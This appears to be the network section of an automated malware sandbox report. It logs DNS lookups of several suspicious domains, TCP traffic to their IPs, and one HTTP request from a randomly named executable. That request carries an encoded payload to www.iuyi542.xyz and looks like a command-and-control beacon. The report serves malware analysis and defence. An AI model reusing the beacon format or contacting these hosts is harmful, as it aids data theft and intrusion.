                                                                                        Nov 1, 2024 19:44:48.474070072 CET5001880192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:48.479070902 CET8050018172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:48.479099989 CET8050018172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:48.479162931 CET8050018172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:48.479167938 CET8050018172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:48.479192019 CET8050018172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:48.479245901 CET8050018172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:48.479265928 CET8050018172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:48.479279041 CET8050018172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:48.479304075 CET8050018172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:49.639130116 CET8050018172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:49.639153004 CET8050018172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:49.639229059 CET5001880192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:49.640654087 CET8050018172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:49.640702963 CET5001880192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:49.987379074 CET5001880192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:51.003093958 CET5001980192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:51.008007050 CET8050019172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:51.011734009 CET5001980192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:51.019057035 CET5001980192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:51.024012089 CET8050019172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:52.182286024 CET8050019172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:52.182312965 CET8050019172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:52.182332039 CET8050019172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:52.182352066 CET8050019172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:52.182677031 CET8050019172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:52.183670044 CET5001980192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:52.187666893 CET5001980192.168.2.4172.67.185.22
                                                                                        Nov 1, 2024 19:44:52.192506075 CET8050019172.67.185.22192.168.2.4
                                                                                        Nov 1, 2024 19:44:57.394016027 CET5002080192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:44:57.398967028 CET8050020206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:44:57.399033070 CET5002080192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:44:57.412718058 CET5002080192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:44:57.417644024 CET8050020206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:44:58.363006115 CET8050020206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:44:58.423224926 CET5002080192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:44:58.537998915 CET8050020206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:44:58.538270950 CET5002080192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:44:58.923677921 CET5002080192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:44:59.941006899 CET5002180192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:44:59.945918083 CET8050021206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:44:59.946010113 CET5002180192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:44:59.957331896 CET5002180192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:44:59.962236881 CET8050021206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:45:00.930490017 CET8050021206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:45:00.987679958 CET5002180192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:45:01.112179041 CET8050021206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:45:01.115782976 CET5002180192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:45:01.470937967 CET5002180192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:45:02.487680912 CET5002280192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:45:02.492983103 CET8050022206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:45:02.493072033 CET5002280192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:45:02.507702112 CET5002280192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:45:02.512619972 CET8050022206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:45:02.512643099 CET8050022206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:45:02.512870073 CET8050022206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:45:02.512926102 CET8050022206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:45:02.513031006 CET8050022206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:45:02.513040066 CET8050022206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:45:02.513050079 CET8050022206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:45:02.513060093 CET8050022206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:45:02.513073921 CET8050022206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:45:03.487620115 CET8050022206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:45:03.578155994 CET5002280192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:45:03.669317961 CET8050022206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:45:03.669372082 CET5002280192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:45:04.017132998 CET5002280192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:45:05.035695076 CET5002380192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:45:05.041148901 CET8050023206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:45:05.041290998 CET5002380192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:45:05.048012972 CET5002380192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:45:05.053379059 CET8050023206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:45:06.283180952 CET8050023206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:45:06.284647942 CET8050023206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:45:06.284781933 CET8050023206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:45:06.284929037 CET5002380192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:45:06.287693977 CET5002380192.168.2.4206.119.82.172
                                                                                        Nov 1, 2024 19:45:06.292710066 CET8050023206.119.82.172192.168.2.4
                                                                                        Nov 1, 2024 19:45:20.357827902 CET5002480192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:20.362766981 CET8050024103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:20.363493919 CET5002480192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:20.373266935 CET5002480192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:20.378879070 CET8050024103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:21.875133038 CET5002480192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:21.881484985 CET8050024103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:21.881545067 CET5002480192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:22.895699978 CET5002580192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:22.900727034 CET8050025103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:22.900847912 CET5002580192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:22.911436081 CET5002580192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:22.917248011 CET8050025103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:24.423787117 CET5002580192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:24.429425955 CET8050025103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:24.431739092 CET5002580192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:25.453032017 CET5002680192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:25.459244013 CET8050026103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:25.459327936 CET5002680192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:25.472213984 CET5002680192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:25.477502108 CET8050026103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:25.477557898 CET8050026103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:25.477646112 CET8050026103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:25.477654934 CET8050026103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:25.477664948 CET8050026103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:25.477722883 CET8050026103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:25.477732897 CET8050026103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:25.477776051 CET8050026103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:25.477786064 CET8050026103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:26.984652042 CET5002680192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:27.292041063 CET8050026103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:27.292100906 CET5002680192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:28.003776073 CET5002780192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:28.009330988 CET8050027103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:28.009454012 CET5002780192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:28.017379045 CET5002780192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:28.022589922 CET8050027103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:30.021539927 CET8050027103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:30.062782049 CET5002780192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:30.280095100 CET8050027103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:30.280575991 CET5002780192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:30.283709049 CET5002780192.168.2.4103.191.208.137
                                                                                        Nov 1, 2024 19:45:30.288522005 CET8050027103.191.208.137192.168.2.4
                                                                                        Nov 1, 2024 19:45:35.301605940 CET5002880192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:35.306608915 CET80500283.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:35.306682110 CET5002880192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:35.319185019 CET5002880192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:35.324166059 CET80500283.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:36.381829023 CET80500283.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:36.437601089 CET5002880192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:36.614161015 CET80500283.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:36.615777016 CET5002880192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:36.831708908 CET5002880192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:37.847050905 CET5002980192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:37.852035999 CET80500293.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:37.852118969 CET5002980192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:37.862956047 CET5002980192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:37.867793083 CET80500293.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:38.926793098 CET80500293.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:38.984457970 CET5002980192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:39.183108091 CET80500293.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:39.183809042 CET5002980192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:39.375154018 CET5002980192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:40.395721912 CET5003080192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:40.402205944 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:40.403172970 CET5003080192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:40.415122986 CET5003080192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:40.420056105 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:40.420126915 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:40.420133114 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:40.420202017 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:40.420207024 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:40.420610905 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:40.420686007 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:40.420835018 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:40.420871019 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:41.508430958 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:41.671963930 CET5003080192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:41.752641916 CET80500303.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:41.752712965 CET5003080192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:41.922238111 CET5003080192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:42.943715096 CET5003180192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:42.948769093 CET80500313.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:42.948854923 CET5003180192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:42.955718040 CET5003180192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:42.960608959 CET80500313.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:44.023185015 CET80500313.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:44.078738928 CET5003180192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:44.256689072 CET80500313.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:44.259905100 CET5003180192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:44.263720989 CET5003180192.168.2.43.111.160.216
                                                                                        Nov 1, 2024 19:45:44.268620968 CET80500313.111.160.216192.168.2.4
                                                                                        Nov 1, 2024 19:45:49.286375046 CET5003280192.168.2.4203.161.49.193
                                                                                        Nov 1, 2024 19:45:49.291261911 CET8050032203.161.49.193192.168.2.4
                                                                                        Nov 1, 2024 19:45:49.291316986 CET5003280192.168.2.4203.161.49.193
                                                                                        Nov 1, 2024 19:45:49.304497004 CET5003280192.168.2.4203.161.49.193
                                                                                        Nov 1, 2024 19:45:49.309598923 CET8050032203.161.49.193192.168.2.4
                                                                                        Nov 1, 2024 19:45:50.008357048 CET8050032203.161.49.193192.168.2.4
                                                                                        Nov 1, 2024 19:45:50.047466993 CET8050032203.161.49.193192.168.2.4
                                                                                        Nov 1, 2024 19:45:50.047522068 CET5003280192.168.2.4203.161.49.193
                                                                                        Nov 1, 2024 19:45:50.812665939 CET5003280192.168.2.4203.161.49.193
                                                                                        Nov 1, 2024 19:45:52.191390038 CET5003380192.168.2.4203.161.49.193
                                                                                        Nov 1, 2024 19:45:52.196249008 CET8050033203.161.49.193192.168.2.4
                                                                                        Nov 1, 2024 19:45:52.196346045 CET5003380192.168.2.4203.161.49.193
                                                                                        Nov 1, 2024 19:45:52.207448006 CET5003380192.168.2.4203.161.49.193
                                                                                        Nov 1, 2024 19:45:52.212407112 CET8050033203.161.49.193192.168.2.4
                                                                                        Nov 1, 2024 19:45:52.906157970 CET8050033203.161.49.193192.168.2.4
                                                                                        Nov 1, 2024 19:45:52.943828106 CET8050033203.161.49.193192.168.2.4
                                                                                        Nov 1, 2024 19:45:52.949935913 CET5003380192.168.2.4203.161.49.193

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 1, 2024 19:43:45.138778925 CET4993953192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 19:43:45.152220964 CET53499391.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 19:44:01.310710907 CET4918753192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 19:44:01.320707083 CET53491871.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 19:44:15.753459930 CET5440953192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 19:44:15.766205072 CET53544091.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 19:44:29.065922976 CET5290353192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 19:44:29.482215881 CET53529031.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 19:44:43.348716021 CET5498253192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 19:44:43.359234095 CET53549821.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 19:44:57.212191105 CET5134053192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 19:44:57.390842915 CET53513401.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 19:45:11.301551104 CET5028053192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 19:45:11.308634043 CET53502801.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 19:45:19.364027977 CET5221353192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 19:45:20.355298996 CET53522131.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 19:45:35.285450935 CET5152153192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 19:45:35.298808098 CET53515211.1.1.1192.168.2.4
                                                                                        Nov 1, 2024 19:45:49.269638062 CET5483553192.168.2.41.1.1.1
                                                                                        Nov 1, 2024 19:45:49.282291889 CET53548351.1.1.1192.168.2.4

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Nov 1, 2024 19:43:45.138778925 CET192.168.2.41.1.1.10x687Standard query (0)www.iuyi542.xyzA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 19:44:01.310710907 CET192.168.2.41.1.1.10x455dStandard query (0)www.vrxlzluy.shopA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 19:44:15.753459930 CET192.168.2.41.1.1.10xcc5dStandard query (0)www.trifecta.centerA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 19:44:29.065922976 CET192.168.2.41.1.1.10x5e67Standard query (0)www.wcp95.topA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 19:44:43.348716021 CET192.168.2.41.1.1.10x4efdStandard query (0)www.gokulmohan.onlineA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 19:44:57.212191105 CET192.168.2.41.1.1.10x2ff3Standard query (0)www.wddb97.topA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 19:45:11.301551104 CET192.168.2.41.1.1.10x140Standard query (0)www.xtelify.techA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 19:45:19.364027977 CET192.168.2.41.1.1.10xe1fdStandard query (0)www.roopiedutech.onlineA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 19:45:35.285450935 CET192.168.2.41.1.1.10xae7Standard query (0)www.comvq.funA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 19:45:49.269638062 CET192.168.2.41.1.1.10x3e01Standard query (0)www.harmonid.lifeA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Nov 1, 2024 19:43:45.152220964 CET1.1.1.1192.168.2.40x687No error (0)www.iuyi542.xyziuyi542.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 1, 2024 19:43:45.152220964 CET1.1.1.1192.168.2.40x687No error (0)iuyi542.xyz38.47.237.27A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 19:44:01.320707083 CET1.1.1.1192.168.2.40x455dNo error (0)www.vrxlzluy.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 19:44:01.320707083 CET1.1.1.1192.168.2.40x455dNo error (0)www.vrxlzluy.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 19:44:15.766205072 CET1.1.1.1192.168.2.40xcc5dNo error (0)www.trifecta.centertrifecta.centerCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 1, 2024 19:44:15.766205072 CET1.1.1.1192.168.2.40xcc5dNo error (0)trifecta.center3.33.130.190A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 19:44:15.766205072 CET1.1.1.1192.168.2.40xcc5dNo error (0)trifecta.center15.197.148.33A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 19:44:29.482215881 CET1.1.1.1192.168.2.40x5e67No error (0)www.wcp95.topwcp95.topCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 1, 2024 19:44:29.482215881 CET1.1.1.1192.168.2.40x5e67No error (0)wcp95.top154.23.184.95A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 19:44:43.359234095 CET1.1.1.1192.168.2.40x4efdNo error (0)www.gokulmohan.online172.67.185.22A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 19:44:43.359234095 CET1.1.1.1192.168.2.40x4efdNo error (0)www.gokulmohan.online104.21.64.124A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 19:44:57.390842915 CET1.1.1.1192.168.2.40x2ff3No error (0)www.wddb97.topwddb97.topCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 1, 2024 19:44:57.390842915 CET1.1.1.1192.168.2.40x2ff3No error (0)wddb97.top206.119.82.172A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 19:45:11.308634043 CET1.1.1.1192.168.2.40x140Name error (3)www.xtelify.technonenoneA (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 19:45:20.355298996 CET1.1.1.1192.168.2.40xe1fdNo error (0)www.roopiedutech.onlineroopiedutech.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 1, 2024 19:45:20.355298996 CET1.1.1.1192.168.2.40xe1fdNo error (0)roopiedutech.online103.191.208.137A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 19:45:35.298808098 CET1.1.1.1192.168.2.40xae7No error (0)www.comvq.fun3.111.160.216A (IP address)IN (0x0001)false
                                                                                        Nov 1, 2024 19:45:49.282291889 CET1.1.1.1192.168.2.40x3e01No error (0)www.harmonid.life203.161.49.193A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • www.iuyi542.xyz
                                                                                        • www.vrxlzluy.shop
                                                                                        • www.trifecta.center
                                                                                        • www.wcp95.top
                                                                                        • www.gokulmohan.online
                                                                                        • www.wddb97.top
                                                                                        • www.roopiedutech.online
                                                                                        • www.comvq.fun
                                                                                        • www.harmonid.life

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.44973838.47.237.27804340C:\Program Files (x86)\rizqIVzCeXIoXpxcYlmbyrJNvbuIuIJcgHKKmULsEvAlZEqLwhbjbhBKkxgTOYIdLkL\AUHJGnjYgKTjWw.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 1, 2024 19:43:45.170517921 CET446OUTGET /b6lw/?XbDhGVR=FO9SkkJ/zSkBY2gKE3XjGE22XLVH89fAFT5UFdCZW5l7B5PRw+4+Jbotmp48rM/okqGzRuEUvPhZhQzUiZGHGB1tKbDdMwj50dTtgpwp3v/R5pIWGJdc6oQ=&Qz=BJvp0BdhxXiTCTGP HTTP/1.1
                                                                                        Host: www.iuyi542.xyz
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-us
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
                                                                                        Nov 1, 2024 19:43:45.850938082 CET170INHTTP/1.1 404 Not Found
                                                                                        Server: nginx
                                                                                        Date: Fri, 01 Nov 2024 18:43:45 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 167433
                                                                                        Connection: close
                                                                                        ETag: "652641ca-28e09"
                                                                                        Nov 1, 2024 19:43:45.851000071 CET1236INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 20 50 61 67 65 3c
                                                                                        Data Ascii: <html lang="en"><head> <meta charset="UTF-8"> <title>CodePen - 404 Page</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style>button,hr,input{overflow:visible}audio,canvas,progress,video{dis
                                                                                        Nov 1, 2024 19:43:45.851082087 CET212INData Raw: 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 73 75 62 6d
                                                                                        Data Ascii: ne-height:1.15;margin:0}button,input{}button,select{text-transform:none}[type=submit], [type=reset],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inn
                                                                                        Nov 1, 2024 19:43:45.851093054 CET1236INData Raw: 65 72 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64
                                                                                        Data Ascii: er,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:0}[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring,button:-moz-focusring{outline:ButtonText dotted 1px}fieldset{border:1
                                                                                        Nov 1, 2024 19:43:45.851103067 CET212INData Raw: 3b 2d 2d 6f 72 61 6e 67 65 3a 23 66 64 37 65 31 34 3b 2d 2d 79 65 6c 6c 6f 77 3a 23 66 66 63 31 30 37 3b 2d 2d 67 72 65 65 6e 3a 23 32 38 61 37 34 35 3b 2d 2d 74 65 61 6c 3a 23 32 30 63 39 39 37 3b 2d 2d 63 79 61 6e 3a 23 31 37 61 32 62 38 3b 2d
                                                                                        Data Ascii: ;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#f
                                                                                        Nov 1, 2024 19:43:45.851265907 CET1236INData Raw: 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69
                                                                                        Data Ascii: fc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helve
                                                                                        Nov 1, 2024 19:43:45.851277113 CET212INData Raw: 65 6d 7d 61 62 62 72 5b 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 5d 2c 61 62 62 72 5b 74 69 74 6c 65 5d 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65
                                                                                        Data Ascii: em}abbr[data-original-title],abbr[title]{text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0}address{margin-bottom:1rem;font-style:norma
